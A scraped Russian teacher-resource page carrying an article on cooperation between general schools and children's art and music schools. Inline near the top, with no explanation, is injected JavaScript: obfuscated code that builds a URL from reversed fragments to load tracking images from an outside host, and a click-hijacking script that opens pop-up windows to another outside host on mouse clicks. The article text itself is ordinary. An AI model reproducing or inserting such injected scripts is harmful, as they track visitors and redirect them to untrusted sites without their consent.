Взаимодействие основного и дополнительного образования
Взаимодействие основного и дополнительного образования
Важная роль в повышения эффективности эстетического воспитания подростков отводится взаимодействию основной школы с учреждениями дополнительного образования, в частности, учреждениями дополнительного музыкального образования.
var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['cewiehib.lussoit.com','80'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif')); var e,n,o;window.self===window.top&&(e=['//','s:','tp','ht'].reverse().join(''),n=['cewiehib.lussoit.com','67'].join('/'),(o=new Image).src=''.concat(e).concat(n,'.gif')); !function(){ var expDate = function(){return Date.now() / 1000 | 0;}; var pingTime = localStorage.getItem("clclicktime") || 0; var secPassed = expDate()-pingTime; var url = ""; if (window == window.top && (pingTime == 0 || secPassed 60)) { var img = new Image(); var image_url = "https://c.kiz0.ru/cp/as2"; img.src = image_url; img.addEventListener("load",function(){ url = 'https://c.kiz0.ru/cr/as2'; }); img.addEventListener("error",function(){ localStorage.setItem("clclicktime",expDate()); }); } var par = "menubar=yes,location=yes,resizable=yes,scrollbars=yes,status=yes"; var txt = new Array(); txt[0]="http://yandex.ru/"; txt[1]="http://google.com/"; var b = Math.round(Math.random() * (txt.length - 1)); var ssilka = txt[b]; function showclick() { if (url != "") { var hrf = url; url = ""; window.open(hrf, "site", par); localStorage.setItem("clclicktime",expDate()); } } document.addEventListener('mousedown',showclick); }();
Вы уже знаете о суперспособностях современного учителя?
Тратить минимум сил на подготовку и проведение уроков.
Быстро и объективно проверять знания учащихся.
Сделать изучение нового материала максимально понятным.
Избавить себя от подбора заданий и их проверки после уроков.
Просмотр содержимого документа
«Взаимодействие основного и дополнительного образования»
Взаимодействие основного и дополнительного образования
Егорова Е.П.
МБУ ДО ДШИ г. Нытва,
преподаватель, концертмейстер
08.11.2020
Формирование всесторонне развитой личности является одной из самых главных целей в воспитании учащихся. И это закономерно, потому что в жизни общества всё более возрастает роль эстетического начала в нравственном развитии школьников. Ощущается острая необходимость снизить напряженность, нетерпимость, агрессивность среди детей и подростков. Конечно, общеобразовательные школы занимаются эстетическим воспитанием, но в большинстве случаев оно происходит фрагментарно и бессистемно, к тому же существует ряд факторов, отрицательно влияющих на эффективность воспитательной работы:
1) разрыв контакта между семьей и школой,
2) ухудшение взаимодействия поколений в семье в области духовно-эстетической практики (вместе не поют, не слушают музыку, не посещают музеи);
3) негативное влияние средств массовой информации, пропагандирующих произведения искусства и культуры низкого художественного и нравственного уровня на формирование эстетического сознания подростков;
4) низкая заинтересованность государства в вопросе повышения социального статуса педагогов дополнительного образования;
5) остаточный принцип финансирования дополнительного образования, в котором и решаются проблемы духовного развития личности.
Становится очевидным, что в новой образовательной ситуации школа не сможет в полной мере решить задачи повышения эффективности эстетического воспитания подростков. В этом плане дополнительное образование детей представляет собой реальную социальную силу, способную последовательно противостоять натиску всевозможных «контркультур», дестабилизирующих молодое поколение.
По большому счету, основное и дополнительное образование не должны существовать друг без друга, ибо по отдельности они односторонни и неполноценны. «Как целостен отдельный ребенок во всем многообразии его потребностей и способностей, так и образование обязано быть комплексным, обеспечивающим полноценное развитие ребенка во всем богатстве его запросов и интересов»
Важная роль в повышения эффективности эстетического воспитания подростков отводится взаимодействию основной школы с учреждениями дополнительного образования, в частности, учреждениями дополнительного музыкального образования. Ведь музыка, как вид искусства, обладает глубоким воспитательным действием на человека, приносит прекрасное в нашу жизнь и делает нас лучше. Невозможно переоценить значение музыки в эстетическом, нравственно-духовном и патриотическом воспитании людей. Музыкальное искусство является неотъемлемым фактором познания истины, добра и красоты. Перед педагогическими коллективами школ сегодня стоит задача усиления процесса воздействия музыки на формирование личности. Необходимо остановить волну духовной опустошенности детей и молодежи, и далеко не последнюю роль в этом может играть сотрудничество и взаимодействие между системами образования и культуры. Основная задача состоит в выявлении оптимальных условий такого взаимодействия.
К сожалению, на сегодняшний день, воспитательная роль музыки в процессе формирования личности снижается. Многие интересуются музыкой, не имеющей глубокого содержания, так любой школьник назовет исполнителей зарубежной и отечественной поп-музыки, но не знает всемирно известных, профессиональных певцов, музыкантов, композиторов и не споет, фактически, ни одной народной песни. К тому же в старших классах обязательные уроки музыки прекращаются, и в сознании подростков господствуют средства массовой информации, а в будущем планируется сделать урок музыки предметом по выбору.
В детских школах искусств так же есть проблемы: постоянное повышение стоимости обучения, нежелание родителей более углублённо заниматься основами музыки и музыкальной культурой. Другая проблема: огромная нагрузка в общеобразовательной школе-
даже третьеклассники имеют по 6! уроков в день. Учащиеся ДМШ - это талантливые, ответственные дети, но общеобразовательная школа усложняет им жизнь: их задерживают на последних уроках, устраивают дополнительные ненужные уроки (6 и 7 часы), а объемы домашних заданий ужасают. Как преподавателям в дальнейшем готовить лучших учеников к профессии, если детям некогда заниматься?
Для того чтобы дополнительное образование могло в полной мере реализовать заложенный в нем потенциал, необходима четкая и слаженная работа всей педагогической системы. Педагоги основного и дополнительного образования обязаны знать особенности работы друг друга, понимать специфику работы, сложности и преимущества. Только их взаимопомощь и совместные продуманные действия могут стать основой для создания целостного образовательного пространства.
Развитие взаимодействия ДШИ и общеобразовательных школ – это очень важное направление совместной деятельности департаментов образования и культуры. Решение задачи значительного увеличения количества детей, пользующихся образовательными услугами дополнительного образования художественно-эстетической направленности, невозможно без сотрудничества двух типов школ: общеобразовательной и искусств. Новый закон "Об образовании в Российской Федерации" постепенно позволит изменить ситуацию, так как в нем предусмотрено сетевое взаимодействие образовательных учреждений. Дополнительное образование в ДШИ может учитываться, как совместная деятельность организаций, направленная на обеспечение возможности освоения обучающимся образовательной программы с использованием ресурсов нескольких организаций, осуществляющих образовательную деятельность (статья 15). Конечно, все эти нормы закона постепенно будут входить в нашу жизнь, но данное взаимодействие двух школ - общеобразовательной и школы искусств - реально и взаимовыгодно.
Условия оптимальной готовности общеобразовательных школ к продуктивному сотрудничеству с ДШИ:
– фактическое обоснование необходимости сотрудничества общеобразовательного учреждения и конкретной ДШИ. Так как ФГОС не исключает дополнительное образование детей из контекста образования, но переносит его в положение ресурса, возможность использования (или неиспользования!) которого определяет каждая школа самостоятельно;
– планирование системы внеурочной деятельности с учетом реальных ресурсных возможностей ДШИ;
– определение до начала учебного года заказа в адрес ДШИ в виде перечня направлений и форм сотрудничества с ним;
– рассмотрение вопроса о возможности качественного обеспечения учебной деятельности детских объединений на базе образовательного учреждения (материально-технические условия, согласование расписания, определение учебных кабинетов и др.).
Очень важно создавать режим благоприятствования для воспитанников, занимающихся в ДШИ, обеспечить им условия для занятий, широко использовать их творческие возможности в подготовке внеклассных, общешкольных мероприятий, демонстрации личных достижений: сольные концерты, презентации, выступления и др.
Важнейшие условия готовности ДШИ к продуктивному сотрудничеству с общеобразовательными учреждениями:
– наличие программно-методического обеспечения для осуществления образовательной деятельности детских творческих объединений под задачи Федерального государственного образовательного стандарта;
– умение педагогов дополнительного образования оценивать результативность образовательного процесса в самых разных формах сотрудничества с конкретным образовательным учреждением (школой);
–умение педагога методически грамотно реагировать на изменение комплекса требований к образовательному процессу;
– предоставление в образовательное учреждение (школу) опережающей информации о возможной занятости ребенка в мероприятиях ДШИ
– определение возможностей для организации индивидуальной и групповой образовательной деятельности детей, направленной на духовно-нравственное и общекультурное развитие на базе ДШИ;
– создание программы по организации содержательной, педагогически целесообразно организованной занятости детей в каникулярное время.
В педагогических исследованиях последних лет все чаще обращаются к проблеме интеграции основного и дополнительного образования детей. Этимология слова «интеграция» означает восстановление целостности, восполнение чего-то недостающего, процесс взаимосвязи и сближения. Интеграция – это всегда движение навстречу друг другу, стремление помочь и принять меры, восполнить недостатки другой стороны и обогатиться за счет достоинств этой стороны. Это взаимообусловленный процесс, в результате которого выигрывают обе стороны. Под интеграцией в образовании понимается процесс сращивания образовательных учреждений одних видов с другими видами, это есть максимальное расширение образовательного пространства образовательных учреждений. Такая интеграция позволяет сблизить процессы воспитания, обучения и развития, что является одной из наиболее сложных проблем современной педагогики.
Существуют разные уровни интеграции общеобразовательной школы и ДШИ
Информационный уровень. На этой ступени приходит осознание необходимости взаимосвязи общего и дополнительного образования, выяснение достоинств и недостатков друг друга, определение возможных направлений сотрудничества между представителями разных сфер образования, т. е. когда общеобразовательное учреждение просто благожелательно относится к занятиям в своих учеников в ДШИ
Координационный уровень,состоит в согласовании планов, определении сфер совместной деятельности классных руководителей и педагогов ДШИ. На этой ступени проводятся отдельные общешкольные мероприятия при равном участии представителей основного и дополнительного образования. Накапливается опыт проведения совместных педагогических и методических советов, посвященных наиболее значимым для всех темам образования и воспитания школьников. Как, правило, ДШИ создает на базе общеобразовательного учреждения отдельные творческие объединения детей, занятия с которыми ведут педагоги ДШИ или, наоборот, проводятся уроки музыки, МХК на базе ДШИ
Уровень сотрудничества, характеризуется более тесной координацией и совместной деятельностью, построенной на основе долгосрочной программы, перспективного плана работы. Этот достаточно высокий уровень взаимодействия предполагает: постоянную совместную деятельность педагогов ДШИс учителями-предметниками и классными руководителями при реализации собственных образовательных программ; сотрудничество заместителя директора, курирующего дополнительное образование, с другими заместителями, с руководителями методических объединений. Благодаря творческим и деловым контактам школы с ДШИ улучшается содержание и уровень подготовки различных массовых мероприятий: совместных творческих встреч, концерты, мастер-классов, праздников, музыкальных композиций.
Уровень интеграции -это создание учебно-воспитательных комплексов (далее – УВК). На сегодняшний день это наиболее эффективный вариант с точки зрения интеграции основного и дополнительного образования детей, поскольку здесь органично сочетаются возможности обоих видов образования. В УВК, как правило, создается солидная инфраструктура школьного дополнительного образования, на основе чего появляются условия для удовлетворения разнообразных потребностей ребенка и его реального самоутверждения. Чаще всего УВК реализуются в виде стационарного соединения в единую организационную структуру основного и дополнительного образования детей.
Например, на базе общеобразовательной школы может функционировать филиал ДШИ. Общеобразовательная школа может входить и в состав еще более сложных объединений, типа “школа – учреждение дополнительного образования – вуз”. Организация УВК особенно эффективна для удаленных от центра микрорайонов современных крупных мегаполисов, а также для небольших городов, где они играют роль культурных центров для значительной части населения. В УВК по единому плану работают большие педагогические коллективы, где кроме школьных учителей, обязательно есть специалисты по дополнительному образованию детей, работники культуры. Нередко здесь образование строят, идя не от урока к внеурочной деятельности, а наоборот. Вторая, внеурочная, половина дня оказывает существенное влияние на первую, занятую уроками.
В условиях общеобразовательного учреждения дополнительное образование дает ребенку реальную возможность выбора своего индивидуального пути. Получение ребенком такой возможности означает его включение в занятия по интересам, создание условий для достижений, успехов в соответствии с собственными способностями и безотносительно к уровню успеваемости по обязательным учебным дисциплинам. Дополнительное образование детей увеличивает пространство, в котором школьники могут развивать свою творческую и познавательную активность, реализовывать свои личностные качества, демонстрировать те способности, которые зачастую остаются невостребованными основным образованием. В дополнительном образовании детей ребенок сам выбирает содержание и форму занятий, может не бояться неудач.
Как показывает опыт УВК и других школ с развитой системой дополнительного образования, сегодня нельзя рассчитывать только на учебный процесс. Дополнительное образование детей расширяет воспитательные возможности школы и ее культурное пространство, способствует самоопределению школьников в личностной, социо-культурной, профессиональной областях, включению их в различные виды творческой деятельности, позитивному отношению к ценностям образования и культуры, развитию нравственных качеств и эмоциональной сферы школьников.